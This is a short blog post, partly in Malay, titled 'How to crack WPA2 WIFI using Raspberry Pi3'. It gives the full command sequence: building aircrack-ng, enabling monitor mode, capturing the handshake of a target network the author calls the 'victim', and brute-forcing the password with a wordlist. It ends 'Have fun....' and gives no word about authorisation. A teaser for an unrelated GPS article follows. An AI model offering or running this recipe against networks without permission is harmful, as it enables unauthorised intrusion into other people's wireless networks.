Monday, May 15, 2017

How to crack WPA2 WIFI using Raspberry Pi3

sudo apt-get -y install libssl-dev libnl-3-dev libnl-genl-3-dev ethtool

wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
tar -zxvf aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
sudo make
sudo make install

sudo airodump-ng-oui-update

sudo airmon-ng start wlan1

sudo airodump-ng --bssid xx:xx:xx:xx:xx -c X --write (nama wifi mangsa) wlan1mon

apabila dapat handshake, tekan crtl+c untuk hentikan, kemudian run

sudo aircrack-ng (nama mangsa)-01.cap -w ./yourwordlist.txt

tunggu hingga password muncul, proses ini memakan masa hingga 2 atau lebih jam.

Have fun....

Connect a GPS module to a Raspberry Pi 4

  To connect a GPS module with four wires (RST, TX, VCC, and GND) to a Raspberry Pi 4, follow these steps:  Materials Needed: 1. GPS module ...